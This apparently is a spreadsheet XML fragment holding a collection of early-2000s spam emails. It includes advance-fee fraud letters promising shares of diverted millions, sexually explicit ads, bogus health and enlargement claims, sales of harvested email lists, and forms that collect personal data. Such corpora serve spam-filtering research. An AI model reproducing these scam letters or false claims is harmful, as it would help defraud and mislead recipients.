amount of US$29,200,000.00 (Twenty-Nine Million Two Hundred Thousand US Dollars).
Though the actual contract cost has been paid to the original contractor, leaving the
excess balance unclaimed.Since the present elected Government is determined to pay foreign contractors all debts owed,
so as to maintain good relations with foreign governments and non-governmental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You/your Company.I have the authority of my colleagues involved to propose that should you be willing to assist us in
this transaction your share as compensation will be US$7.3m (25%) while my colleagues and I receive
US$18.98m (65%) and the balance of US$2.92m (10%) for taxes and miscellaneous expenses incurred.This business is completely safe and secure, provided you treat it with utmost confidentiality.
It does notmatter whether You/your Company does contract projects, as a transfer of
powers will be secured in favour of You/your Company. Also, your specialization is not a
hindrance to the successful execution of this transaction. I have reposed my confidence in you
and hope that you will not disappoint us.Kindly notify me by telephone on 27-83-750 9598 or fax 27-73-219 9975 for
further details upon your acceptance of this proposal.May God's blessings be with you even as you reply.Regards,
MR. AYANDA MAREDI
</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Sir.First,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Claim.Yours faithfully,DR MARKUS PHILLIPS.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Sir.First,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Claim.Yours faithfully,DR MARKUS PHILLIPS.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Steph
I have found the talent that you are looking for, check out www.piercebrosnanlookalike.com
I found it last nite, he will be ideal for the movie, we should audition him next week. Let's do lunch next week call me.Davida 
</t>
  </si>
  <si>
    <t xml:space="preserve">Flat-Rate Unlimited Domestic Calling?How does it work?&gt;From the registered phone line, you can call to any phone in the contiguous 48 States. You speed dial an access #, then you simply dial the number you wish to reach. That's it, how easy can it get?* What are the limits?The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service.What's the price?The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account.What calling charges are covered?This service will eliminate any per minute charges for: In-state and State-to-state long distance It's all included...One Low Monthly Flat Rate for Unlimited Calling and 0 cents per minute!!To purchase this product, click on:http://www.internationalfreecall.comTo take a 60 minute trial of this product, send your phone number to:8228519@archwireless.netTo remove yourself from this mailing list, click on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1543
</t>
  </si>
  <si>
    <t xml:space="preserve">Flat-Rate Unlimited Domestic Calling?How does it work?&gt;From the registered phone line, you can call to any phone in the contiguous 48 States. You speed dial an access #, then you simply dial the number you wish to reach. That's it, how easy can it get?* What are the limits?The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service.What's the price?The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account.What calling charges are covered?This service will eliminate any per minute charges for: In-state and State-to-state long distance It's all included...One Low Monthly Flat Rate for Unlimited Calling and 0 cents per minute!!To purchase this product, click on:http://www.internationalfreecall.comTo take a 60 minute trial of this product, send your phone number to:8228519@archwireless.netTo remove yourself from this mailing list, click on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1676
</t>
  </si>
  <si>
    <t xml:space="preserve">Flat-Rate Unlimited Domestic Calling?How does it work?&gt;From the registered phone line, you can call to any phone in the contiguous 48 States. You speed dial an access #, then you simply dial the number you wish to reach. That's it, how easy can it get?* What are the limits?The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service.What's the price?The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account.What calling charges are covered?This service will eliminate any per minute charges for: In-state and State-to-state long distance It's all included...One Low Monthly Flat Rate for Unlimited Calling and 0 cents per minute!!To purchase this product, click on:http://www.internationalfreecall.comTo take a 60 minute trial of this product, send your phone number to:8228519@archwireless.netTo remove yourself from this mailing list, click on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1680
</t>
  </si>
  <si>
    <t xml:space="preserve">
LAST CHANCE TO EXHIBIT ATThe Hotel Show 2002
20-22 May, 2002, Airport Expo Dubai, UAEWith over 200 luxury hotels and resorts planned in the Middle East within the next 3-5 years, 'The Hotel Show' has established itself as the region's premier hospitality event for local &amp; international companies wishing to meet directly with major players in the industry. Strong Industry Support'The Hotel Show' is owned by the UK's Daily Mail Group, one of the world's largest media conglomerates with 350 exhibitions worldwide, including Index and Big 5 in Dubai.Held annually at the Airport Expo Dubai, 'The Hotel Show' receives full industry support from regional hospitality-related official bodies and associations such as the Dubai Department of Tourism &amp; Commerce Marketing and the Kuwait Hotel Owner's Association, aswell as governmental organisations such as the Department of Trade &amp; Industry in the U.K who ranked the event as one of the top10 hospitality events around the world. The Hotel Show 2002 Managed by Streamline Marketing, one of the region's leading event organisers, the 2002 event will feature over 150 exhibitors from 20 countries, showcasing a variety of products &amp; services from hi-tech reservations systems to bed linen, tableware and furniture. Sambonet, Siemens, Frette Spa, Micros Fidelio, Villeroy &amp; Boch, Bose and Grundig are just some of the international companies that will use 'The Hotel Show' as a showcase for meeting major players in the industry &amp; making professional contacts.Who can you expect to meet as an exhibitor?* Regional hotel management groups and owner associations * Major 4 &amp; 5 star hotels, furnished apartments and resorts in the Middle East: represented by Owners, Investors, General Managers, Asst General Managers, Purchasing Managers, F&amp;B Managers, IT Managers, Engineering Managers, Housekeepers, Finance Managers, Business Development Managers, Executive Chefs and Security Managers. * Middle East-based Architects, Consultants, Hotel Project Managers, Engineers, Contractors and Designers. With over 80% of exhibition space already contracted, time is running out! Should you require a list of exhibitors and a current floorplan, please contact the organisers immediately on 04-3329029 or laith@streamlineb2b.netYours sincerely,Joanne Evans &amp; Laith Kubba
Directors
Streamline Marketing
</t>
  </si>
  <si>
    <t xml:space="preserve">************************************************
                 $25,000 CASH GIVEAWAY!
************************************************Dear jm@netnoteinc.com,You're receiving this email because you are registered
in the BESTCHEAPSTUFF.COM www.bestcheapstuff.com
customer base. If you would prefer not to receive our mailings, 
please click on the Unsubscribe link below.Subscribe to our newsletter by clicking the confirmation
link: http://www.bestcheapstuff.com/cgi-bin/confirm_sub.cgi?name=yyyy@netnoteinc.com                 
and you will receive the latest information on SPECIAL DEALS, FREE 
VACATION GIVEAWAYS, FREE PRODUCTS, and 
other valuable Promotions from BestCheapStuff.com !Along with your subscription, you will be automatically
entered into our CASH SWEEPSTAKES for $25,000 
in June 2002.CLICK here http://www.bestcheapstuff.com/cgi-bin/confirm_sub.cgi?name=jm@netnoteinc.com            
to confirm your subscription and to ENTER our 
CASH GIVEAWAY for June 2002.**By Not taking any of the above actions you will be deleted from our
mailing list within 30 days.**Thank you for your cooperation.
************************************************
If you prefer not to enter our sweepstakes or get the latest
news on FREE GIVEAWAYS, please click here: 
http://www.bestcheapstuff.com/cgi-bin/unsub.cgi?name=jm@netnoteinc.com                 
We will promptly remove your email from our mailing list.
</t>
  </si>
  <si>
    <t xml:space="preserve">
To:   avfs@fazekas.hu
Attn: Marketing Department
From: I.Q. Software - Bucharest
Ref.: Romanian Software Production &amp; Export------------------------------------------------------------------------
                 Our anti-spamming company policy:
                      NEVER BOTHER YOU AGAIN           To remove your E-mail address from the present
           contact list JUST DO NOT REPLY to this message. If you receive this message by mistake and/or you are not interested
   in the following brief presentation, please accept our apologies.This is a world-wide promotion campaign. The selected E-mail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&gt;&gt;&gt; mentioning your Specific Inquiry/Offering Demand &lt;&lt;&lt;              and your detailed contact information:&gt;&gt;&gt; company name, address, phone &amp; fax numbers, contact person. &lt;&lt;&lt;     Simple replies and advertisements will not be considered.
               We do not open any PC applications.If you answer to this message, we will contact you every 3 months in
order to update our partners service database. Thank you for your time.Best regards,
I.Q. Software Staff
                      Dear customer,Please be so kind and review our Software Production export offer bellow:                  BRIEF EXPORT PROPOSALOur area of interest is quality Software Production
export at the lowest prices.The capabilities and references listed bellow show the advantages
obtained by the institutions we worked for.WE WOULD LIKE YOU TO SEND US YOUR SPECIFIC INQUIRY/OFFERING DEMAND.This will give us the chance to prove our efficiency.Our company's name is I.Q. Software from Bucharest, and we are
one of the most important Romanian software companies. The intense and almost exclusive cooperation with other
foreign companies allowed us to increase our structure
by developing new projects and systems. &gt;From the begining we addressed to private companies
as well as to public administration.Our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 software development;
        - man-power;
        - data-entry;
        - mapdrawing;
        - outsourcing.********************************************************* So that you would be able to have an idea of our skills
  we present you some of our current projects: The Situs System (Informative of Tribunals Bureaus of Supervision)
was realized for informative administration of activities typical
for Tribunals and Bureaus of Supervision for MINISTRY OF JUSTICE -ITALY
(Microsoft Visual Basic 6.0, DataBase: Oracle 8.0). The ICE System foresaw the resigtering of the Italian-Romanian companies
on Romanian territory. The application is constituted by a browser which
allows the navigation and provides some additional skills, advanced search
on varied criterious which are created in a dynamic way by the user
(VisualBasic 6.0, DataBase: Access 97). Museum -the main request from the museum was to handle (multimedia)
documents in specific formats on different operating system and platforms
( C++, HTML, CORBA IDL, ORB: Orbacus). Library  (National Library of FIRENZE)- Informatical system for managing
and labeling the ancient bibliographical materials
(Power Builder, DataBase: Oracle). Interflora - Communication and management system; consists in some
applications and services which allows the communication between
the flowerist man from Italy and International Association of Flowerists
(Visual Basic 6.0). Audit Office - The realization of a porting which foresaw 16 bit controls
for substitution with 32 bit controls, introduction of new ActiveX controls,
substitution of FORMULA 1 with native controls of VISUAL BASIC 6.0. UNICO - The program foresaw the possibility of acquisition from images
of more than 60 models of UNICO and IVA
(fiscal declarations) - (Delphi 4.0. DataBase:SQL). MINISTRY OF FINANCE - FISCAL DOCUMENTATION -The objective is
the easy access to the Italian legislation and its consulting.
The application based on a client/server architecture, using a network
communication (SOCKETS) for data exchange with the server (Visual C++). FOREIGN MINISTRY - ECONOMICAL APPLICATION - 
This application is conceived as a group of projects.
                    ADMINISTRATION 
                    BALANCE-SHEETS 
                    DISPOSITIONS OF PAYMENT 
                    FOREIGN EXPENSES 
                    SYNTHETICALLY DATES 
                    SERVERS 
(Visual Basic 6.0, DataBase: SQL Server 7.0) SOGEI -  THE ADMINISTRATION OF THE CUSTOM HOUSES.
This application is created for the financial administration of the
peripherical offices at the customhouse (Java, HTML, DataBase: Oracle 8.0). ICCREA - Application of processing development of the
bank-procedures on mainframe(COBOL/CICS/DB2). TELECOM - Microfilm Data Acquisition.
Registering numbers and subscribers. ANAGRAFICA - Acquisition from images of dates and personal information. ITALIAN MINISTRY OF FINANCE - Data acquisition
from images of medical prescription. IQ REGISTER - Acquisition of information from images
and optics archives of documentation. * We had been offering for the entire Veneto Region,
  the following professional system engineers: AMBIENTE BULL GCOS 8: Systematical and special assistance
in Interel RFM, SQL, Infoedge. AMBIENTE BULL/RETI: Systematical and special assistance
of regional networks for Datanet, L.A.N., X.25,
DSA, MAINWAY transmission, telematical networks. AMBIENTE UNIX: 2 UNIX system operators with knowledge of GCOS 6. * We have been offering for THE METEOROLOGY INSTITUTE OF PADOVA
  the following professional system engineers: AMBIENTE DIGITAL/UNIX: Systematical and special assistance
for DEC VAX/VMS and UNIX systems with strong enough knowledge
of Informix and C programming. AMBIENTE/DECNET/WINDOWS: Systematical and special assistance
for DEC VAX/VMS and WINDOWS with knowledge in financial administration
of local networks, in financial administration and configuration of
communication systems (router, bridge, gateway, etc) and of products
of exchange data, in financial administration and configuration of
interface systems of Internet. ********************************************************Therefore, to increase our presence to the international
market we took part in the inter-governmental program
between the United States and Romania.Thus, we participated to the international meeting of both
Romanian and American IT companies on 1st November 2001 due
to the kind initiative of both governments.The reason of this program, of the meeting mentioned above and of the
initiatives that followed was to offer a new way for outsourcing, 
more convenient than the Indian one to American software companies. Our company, already present on American market, is interested to be 
a potential partner and one of most interested in cooperating with
American IT companies. Our main interest is both on the American and European market.Our managing staff after visiting Italy managed to establish relations
with this country for our curent projects. On the other side a marketing tour has already been established
in the USA in the month of May for any possible projects.That is why we might be able to directly discuss with you any new project.We'd appreciate your feed-back containing detailed contact coordinates:
company name, address, phone and fax numbers, contact person, web-site.          Our Area of Interest: Software Production Export
 We wish to express our availability to work under the client's brand.PLEASE DON'T HESITATE TO SEND US YOUR SPECIFIC INQUIRY/OFFERING DEMAND.    We'll be happy to provide you the lowest prices in the field.    Thanking you for your time and looking forward to your reply,
                      we wish you all the best.I.Q. Software Staff_______________________________________________
Avfs mailing list
Avfs@csibe.fazekas.hu
http://www.fazekas.hu/mailman/listinfo/avfs
</t>
  </si>
  <si>
    <t xml:space="preserve"> Unsubscribe:Please send a blank mail to:unsub-56446664-3@william.monsterjoke.com
</t>
  </si>
  <si>
    <t>&gt;From Hi-Mind, Assembler of LCD TFT monitors, LCD TV , Plasma.
THIS IS NOT A SPAM. This is an Opt-In Opt-Out clarification.
O/ref Uk_05229Dear Madam,
Dear Sir,You are receiving this mail as you are professionally involves in Computer, Systems and Display Business.
We are willing to inform you regularly by e-mail about Hi-Mind's products, opportunities.With respect to Opt-In:
1. You consider  our infos can be usefull: Do not reply to this mail.
2. You  consider you our infos will be not workable. Please unsubscribe by clicking on infos@hi-mind.com?subject=Please_Unsubscribe3. You are curious to know more please click on:http://www.hi-mind.com/Promotion/LcdWebPro0402a.htmBest regards
S. C Svatshenk
Hi-Mind Communication</t>
  </si>
  <si>
    <t xml:space="preserve">
The Soft2Reg Team.Black11 {FONT-SIZE: 11px; COLOR: black; FONT-FAMILY: Verdana;  FONT-WEIGHT: normal; TEXT-DECORATION: none}
.Red13 {font-size : 13px; font-family :Verdana, Arial, Helvetica, sans-serif;font-weight : bold;color : Red}Soft2reg.com -- Service Update			Hello,
We apologize for the unsolicited e-mail, 
				but we have noticed that you are using an online credit card processor on your web 
				site that charges you much more than what you should be paying. 			
				We are Soft2Reg.com and we specialize in low cost online credit 
				card processing for developers of electronic products. 
				Our rates are the lowest in the industry - 8% flat fee for all online credit card transactions. 
				We provide you with a link for every one of your products that contains your logo and you put it on your web site for seamless credit card processing integration. For that simple, yet efficient service we charge only 8% of your online sales.
			If you would like to see more information about us, please visit http://www.soft2reg.com.
			Thank you,
			The Soft2Reg Team
			-----------------------------------
			www.soft2reg.com.
</t>
  </si>
  <si>
    <t>To remove see below.I work with a company that submits
web sites to search engines and saw
your listing on the internet.We can submit your site twice a month
to over 400 search engines and directories
for only $29.95 per month.We periodically mail you progress
reports showing where you are ranked.To get your web site in the fast lane
call our toll free number below!Sincerely,Brian Waters
888-532-8842
* All work is verified
To be removed call: 888-800-6339 X1377</t>
  </si>
  <si>
    <t>To remove see below.I work with a company that submits
web sites to search engines and saw
your listing on the internet.We can submit your site twice a month
to over 400 search engines and directories
for only $29.95 per month.We periodically mail you progress
reports showing where you are ranked.To get your web site in the fast lane
call our toll free number below!Sincerely,Mike Bender
888-892-7537
* All work is verified
To be removed call: 888-800-6339 X1377</t>
  </si>
  <si>
    <t xml:space="preserve"> Unsubscribe:Please send a blank mail to:unsub-56446664-9@william.monsterjoke.com
</t>
  </si>
  <si>
    <t xml:space="preserve">*This message was transferred with a trial version of CommuniGate(tm) Pro*
Free Debt Consolidation InformationFree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Debt!Â• 100% Confidential - No Obligation - Free Quote Â• Free Debt Consolidation Quote
If you have $4000 or more in debt, a trained professional will negotiate with your creditors to:Lower your monthly debt payments up to 60%End creditor harassmentSave thousands of dollars in interest and late chargesStart improving your credit ratingComplete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send and email to jayshilling4792@excite.commamrfitxhidjpfxo
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t>Request 
                  a FREE loan evaluation. Â 
Apply now, we will find you 
                  theLOWEST RATE 
            GUARANTEED!Â Â  We are a national mortgage 
                  lender referral service who specializes in helping people like 
                  you get the loans you need to:Pay off bills and stop 
                    creditors from calling
Make those long needed home 
                    improvements
Refinance your home at a 
                    better rate
Get cash out for nearly 
                    anything Â Â  Please complete this brief information 
                  request form. It only takes a few minutes, and there is 
                  absolutely no obligation!Â  All information is kept 
                  strictly confidential! Please complete all information. Thank 
                  you!
Â  
                  Important RemindersYou must have at least 20% 
                    equity in homes value to qualify.
Loan Amount must be at 
                    least $30,000 or more.
TX or AL states do NOT 
                    qualify.
Sorry, No Mobile 
                    Homes. 
Free Mortgage Loan Analysis. No 
                  obligation!
ALL INFORMATION IS REQUIRED. THANK YOU!
Are you a home 
                              owner?Choose 
                                one... Yes
NoPrimary Applicant 
                            Name:
Co-Applicant Name:
Street Address:
City:
State:
Zip Code:
Home Phone:
Example: (334) 123-4567Work Phone:
Example: (342) 567-8901Property Type:Select your property...
Single 
                                Family Residence Condominium TownhouseOriginal Purchase 
                              Price:
Example: 100KYear Acquired:
Estimated Property 
                              Value:(Must be at least $50K)
Amount Owed on 1st 
                              Mortgage:
Current Interest Rateon 
                              1st Mortgage:
Fixed Or 
Adjustable?
 Choose 
                                one... Fixed AdjustableMonthly Payment on 1st 
                              Mortgage:
Amount Owed on 2nd 
                              Mortgage:
Current Interest Rateon 
                              2nd Mortgage:
Fixed or 
Adjustable?
 Choose 
                                one... Fixed AdjustableMonthly Payment on 2nd 
                              Mortgage:
Current Employer:
Years With Current 
                              Employer:
Gross Yearly 
Income:
Example: 60KHow is your credit?Make 
                                your best guess... Excellent Good Fair PoorBest Time To Contact 
                              You:
 Choose 
                                one... Morning at Work
Afternoon at 
                                Work Evening at Work
Morning at 
                                Home Afternoon at 
                                Home Evening at 
                              HomeType Of Loan 
                            Desired:
 Select a 
                                loan... Second Mortgage
Debt 
                                Consolidation Refinance Refinance with 
                                Cash Out Home Equity 
                                Line of CreditLoan Amount 
                              Desired:(Must be at least $30K)
Example: 80KYour E-Mail 
Address:
Must be in form: name@domain.com.Please 
                              verify. Thanks!Â 
Â 
Please verify your information - especially 
                              your telephone numbers and e-mail address - before 
                              pressing the button.
Â Â Â Â 
Thank 
                  you! You will be contacted by amortgage professional 
                  shortly.
Â 
Ã¿FFFFA9Â 2002 
            All rights 
  reserved.
To 
                        be Removed from our Opt-In mailing list. Please enter your email address 
                        in the provided box below and click remove. 
Please 
                          allow 48 hours for your email address to be removed.</t>
  </si>
  <si>
    <t xml:space="preserve">
Have you ever wondered how the hell these petite Asian girls,
with their tiny little Asian holes, can accommodate such huge
hard cocks? Oh, but they can expand, can't they!!!? Have you
seen them spread their petite little legs wide open, exposing
their tiny little wet holes? Doesn't that just make you want
to ram your big, throbbing cock in? Well, click on the link
below and jam that big cock of yours in these little Asian
holes NOW!
http://asian-sexfest.com?sp=ten_self&amp;stref=REFa101688i000001
No more mail:
http://203.31.88.12/bye.html
</t>
  </si>
  <si>
    <t xml:space="preserve">
DID YOU KNOW? 
That the average penis size when erect is only 5.7" to 6". 
Over 90% of men posses this size. 
DID YOU KNOW? 
That in a poll conducted by DurexTM Condoms, 
67% of women said they were unhappy with their lover's penis siz=
e. Having a small penis can affect your self-image, and how you view yourself=
 and the world. 
If you feel confident about your manhood, you approach the world different=
ly, 
with extreme confidence and pride.LET US 
SHOW YOU H=
OW!
YOU can add significant PERMANENT size to your penis, 
easily, naturally, and safely, in just a few minutes per day! The groundbreaking techniques we offer are 100% proven, tested, 
and Doctor Recommended, and have worked for thousands of men=
 JUST LIKE YOU!  
DID YOU KNOW? 
That 98% of men have a much weaker, smaller more underdeveloped penis 
compared to what they could possess.  CHANGE THAT NO=
W!
***Don't be fooled by what nature gave you, take CONTROL!***
***No gimmicks, just superb medical breakthroughs! ***
    | | | | | | ||| | | | |||| | | |||\/ 
DID YOU KNOW? 
That the average man ejaculates within 2 to 2.5 minutes of insertion into =
the female. 
Our Exercises WILL lengthen this time CONSIDERABLY!
</t>
  </si>
  <si>
    <t xml:space="preserve">
open("http://www.cn1688.net/girls/")
click here to see more
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½</t>
  </si>
  <si>
    <t xml:space="preserve">WEALTH IN THE NEW MILLENNIUMThe New Millennium has arrived with more financial opportunities than ever
before. Forget everything else that you have ever seen in the past because
you are about to discover the Fastest way to earn Serious Money from home.
You don't have to work 40 to 60 hours a week for 40 years all to make
someone else wealthy. I have a better way!
Are You Interested in creating immediate wealth?Our business develops 6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$100,000 in my very first year in this business.For More Information about this incredible life changing opportunity,
please complete the form below. The Information is FREE, confidential and you are under no risk or obligations.We are looking for those individuals who are serious about making a positive
change in their life immediately.TAKE ACTION NOW!
Please complete the form below.Name:
Address:
City:
State:
Zip:
Country:
Email:
Home Phone:
Other Phone:
Best Time:
Desired Monthly Income: Please choose one.$500
$1000
$2500
$5000 or more
 The sooner you reply, the sooner you will start living the life
you always dreamed of.
To be Removed from this list Please reply
with "Remove" in the subject line
and you will be removed within 24 hours.
mzsczzokjmosobfc
</t>
  </si>
  <si>
    <t>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CopyrightÂ Â© 2001, all rights reserved. [1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, jm@neteze.comAs seen on NBC, CBS, and CNN, and even Oprah!  The health
discovery that actually reverses aging while burning fat,
without dieting or exercise!  This proven discovery has even
been reported on by the New England Journal of Medicine.
Forget aging and dieting forever!  And it's Guaranteed!* Reduce body fat and build lean muscle WITHOUT EXERCISE!
* Enhace sexual performance
* Remove wrinkles and cellulite
* Lower blood pressure and improve cholesterol profile
* Improve sleep, vision and memory
* Restore hair color and growth
* Strengthen the immune system
* Increase energy and cardiac output
* Turn back your body's biological time clock 10-20 years
in 6 months of usage !!!
FOR FREE INFORMATION AND GET FREE 
1 MONTH SUPPLY OF HGH CLICK HERE
You are receiving this email as a subscriber
to the Opt-In America Mailing List. 
To remove yourself from all related maillists,
just  
Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve"> Unsubscribe:Please send a blank mail to:unsub-56446664-12@fiona.free4all.com 
</t>
  </si>
  <si>
    <t xml:space="preserve">
4623
</t>
  </si>
  <si>
    <t xml:space="preserve">Jane,Here is the information you requestedYOUR EMAIL ADDRESS: webmaster@efi.ieTARGETED EMAIL ADDRESS CD-ROM
100 MILLION + ADDRESSESMORE THAN 34 CATEGORIES SUCH AS:
= Multi level Marketers
= Opportunity Seekers 
= Telephone Area code
= Country, City, State, etc..
= People running home businesses or interested in home businesses.
= Travel &amp; Vacations
= Opt-in
= People interested in Investments
= People or businesses who spent more than $1000 on the web in thelast 2 monthsAND  MANY MORE* Contains US &amp; International EMAILS* Everything on this disk is in TEXT file format and fully exportable.* The CD is as easy to use as browsing your C drive in Explorer.HOW THIS AMAZING DIRECTORY WAS COMPILED:*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week.This month only $79 (Regular price $199)DO NOT SEND A REPLY TO THIS EMAIL ADDRESS. TO PLACE AN ORDER, READ INSTRUCTIONS BELOW:TO ORDER BY CREDIT CARD (VISA, MASTERCARD OR AMERICAN EXPRESS)- Simply complete the order form below and fax it back to ( 44 3 )  65  9 - 0 73 0 
Make sure that we have your email address so that we can send you a reciept for your transaction.TO ORDER BY MAIL:Print the form below and send it together with a money order payable to FT International for the balance to:5863 Le s lie St.
Suite 408
T oronto, Ont a rio
CANADAOR D E R  F OR M :Please PRINT clearlyFull Name:________________________________________________Company Name:_____________________________________________Telephone:________________________________________________Fax:______________________________________________________Email Address:__________________________________________* REQUIRED FIELDShipping Address:______________________________________________City:____________________ State/Province:________________Country:_________________________ZIP/Postal:_____________Shipping Options: []  $5 Regular Mail (1 - 2 weeks)   []  $12 Priority Mail (2-4 business days)    []  $25 Fedex (overnight)$79.00 USD + Shipping Charge $________ US   = TOTAL:  $_________ USD======================================================================================[] Credit Card Order    [] Mail OrderCREDIT CARD ORDERS FAX THIS ORDER FORM BACK TO 1 - 44 3 - 6 59 - 07 3 0)
Card #:___________________________________________________Expiry Date: ______________ Type of Card [] VISA  [] MASTERCARD  [] AMERICAN EXPRESSName on Card:_____________________________________________Billing Address:_________________________________ZIP/Postal: ____________City:_____________________State/Province:_______________ Country:_____________Cardholder Signature:______________________________________Please note that FT  I n t e rn a ti  o n al will appear on your statement.=======================================================================================For any questions please feel free to call us at 1 - 4 1 6 - 2 3 6 - 89 8 1To be removed from our database please send an email to ftremovals32663_372@yahoo.com </t>
  </si>
  <si>
    <t xml:space="preserve">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http://%62a%6E%6E%65d%63%64.%6E%65%74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http://%62a%6E%6E%65d%63%64.%6E%65%74/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">REQUEST FOR URGENT BUSINESS RELATIONSHIP Dear Sir,
Firstly, I must solicit your strictest confidentiality
in this transaction. This is by virtue of its nature
as being utterly CONFIDENTIAL and ï¿½TOP SECRET.ï¿½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Osaro Ame,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both foreign
and local contractors in the ministry.I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ourselves.We need your assistance as the funds are presently
secured in an escrow account of the Federal Government
specifically set aside for the settlement of
outstanding payments to foreign contractors. We are
handicapped in this circumstances as the civil service
code of conduct, does not allow us to operate
off-shore accounts, hence your importance in the whole
transaction is highly needed . My colleagues and I have agreed that if you or your
company can act as the beneficiary of this funds on
our behalf, you or your company will retain 20% of the
total amount of US$11,500,000.00 (Eleven Million Five
Hundred Thousand United States Dollars), while 70%
will be for us (members of this panel) and the
remaining 10% will be used in offsetting all
debts/expenses incurred (both local and foreign) in
the cause of this transfer. Needless to say, the trust
reposed on you at this juncture is enormous. In return
we demand your complete honesty and trust. It does not matter whether or not your company does
contract projects of this nature described here, the
assumption is that your company won the major contract
and sub-contracted it out to other companies.  More
often than not, big trading companies or firms of
unrelated fields win major contracts and subcontract
to more specialized firms for execution of such
contracts. We are civil servants and we will not
want to miss this once in a life time opportunity.You must however, NOTE that this transaction will be
strictly based on the following terms and conditions
as we have stated below, as we have heard confirmed
cases of business associates running away with funds
kept in their custody when it finally arrive their
accounts. We have decided that this transaction will
be based completely on the following: (a). Our conviction of your transparent honesty and
diligence. (b). That you would treat this transaction with utmost
secrecy and confidentiality. (c). That upon receipt of the funds, you will promptly
release our share (70%) on demand after you have
removed your 20% and all expenses have been settled. (d). You must be ready to produce us with enough
information about yourself to put our minds at rest. Please, note that this transaction is 100% legal and
risk free and we hope to conclude the business in Ten
Bank working days from the date of receipt of the
necessary information and requirement from you. Endeavour to acknowledge the receipt of this letter
using my email fax number 1-443-658-2542 or my email
address and I will bring you into the complete picture
of this transaction when I have heard from you. Your urgent response will be highly appreciated as we
are already behind schedule for this financial
quarter. Thank you and God bless. Yours faithfully, Dr. Osaro Ame __________________________________________________
Do You Yahoo!?
Yahoo! Health - your guide to health and wellness
http://health.yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
PROMOTE YOUR PRODUCT OR
SERVICE TO MILLIONS TODAY!
Â 
E-MAIL MARKETING
- Bulk e-mail will make you money so fast, your head will
spin!- Our customers tell us that they would no longer be in
business without it.- New collection of software allows you to collect targeted
e-mail addresses for free!Â Â Â  See this product's web
page
CLICK
HERE
Â 
1 MILLION AMERICAN BUSINESS LEADS ON
CD- If you do telemarketing, mailing, or faxing this list
will be a gold mine!
- Contains company name, address,
phone, fax, SIC, # of employees &amp; revenue
-
List allows for
UNLIMITED DOWNLOADS!
Â Â Â 
See this product's web page 
CLICK HERE
Â 
FAX MARKETING SYSTEM
- Fax broadcasting is the hot new way to market your product
or service!- People are 4 times more likely to read faxes than direct
mail.- Software turns your computer into a fax blaster with 4
million  leads on disk!
Â Â Â 
See this product's web page 
CLICK HERE
Â 
Visit our web site or
call 618-288-6661 for more information.
Â 
Â 
Â 
Â to be taken off of our list
click here
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, fork@voycomp.com,As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Would you like to lose weight while you sleep!
No dieting!
No hunger pains!
No Cravings!
No strenuous exercise!
Change your life forever! 
1.Body 
Fat Loss 
82% 
improvement.
2.Wrinkle 
Reduction 
61% 
improvement.
3.Energy 
Level 
84% 
improvement.
4.Muscle 
Strength 
88% 
improvement.
5.Sexual 
Potency 
75% 
improvement.
6.Emotional 
Stability 
67% 
improvement.
7.Memory 62% 
improvement.
100% 
GUARANTEED!Â  You 
are receiving this email as a subscriber
to the Opt-In America Mailing List. 
To remove yourself from all related maillists,
just  
Click Here 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Professional Appointment 
  SettingCommercial &amp; Residential
Leads
  Immediately catapults your salesÂ• Burglar AlarmsÂ  
Â• Home Improvementâ€¢ SoftwareÂ  
â€¢ MortgageÂ• InsuranceÂ  Â•  
Many
More!!!$100 Introductory Package:
4 Manhours of Telemarketing
Services
Call us Toll Free at
1-800-683-0545Â 
Â To remove your address, please send an e-mail message
with 
  the word REMOVE in the subject line to:  carlreed@core.comÂ 
Â Â 
Â http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">FREIGHTMART Mail CampaignTo be REMOVED from any future offers, simply CLICK HERE!
For more info, CLICK HERE!
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">REQUEST FOR URGENT BUSINESS ASSISTANCE
--------------------------------------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father,s 
colleagues to seek your immediate and urgent co-operation 
to receive into your bank account the sum of US $25m.
(twenty-five million Dollars) and some thousands carats
of Diamond. This money and treasures was lodged in a vault with a
security firm in Europe and South-Africa.SOURCES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de,opposition radicale et ses allies (USORAL)
to buy arms with US $200m on 5th January 2001; for him to finalize
the arms deal,my father was murdered. f.K.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100%risk-free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E-mail box for immediate
commencement of the transaction. I count on your honour to keep my
secret, SECRET.Looking forward for your urgent replyThanks.
Best Regards
MPETI L. KABILA (Jnr)
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">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
</t>
  </si>
  <si>
    <t xml:space="preserve">Would you like to earn
Would you li=
ke to earn 
$750 a day using  
eBay
and the 
Internet?
You have received this e=
mail for our free e-book
"Secret$ of   =
eBay 
PowerSeller$" because you expressed an interest in 
making money with eBay and/or on the Internet.I absolutely - 100% - Guarantee you have ne=
ver 
heard of this   eBay 
&amp; Internet money-making system before.This FREE no-strings attached e-book=
"Secrets of 
 eBay
Powersellers" is so powerful, so 
compelling it will blow your mind!Click here to 
START YOUR JOU=
RNEY! towards 
financial freedom May 7th, 2002Mark W. Monday -  The   eB=
ay MillionaireIn just a few minutes reading my book, you =
will 
find an opportunity so powerful, so
compelling, that you'll wonder why someone =
hasn't 
thought of this sooner!This is not a multi level marketing program or "Get rich quick=
 scheme".Â  
It is a real business that can make you rea=
lly
wealthy.You are about to journey to a wonderful pla=
ce. A 
place where freedom from a boss, making you=
r own 
rules and deciding your own destiny are par=
amount. 
A place that offers freedom with your time and a r=
elief 
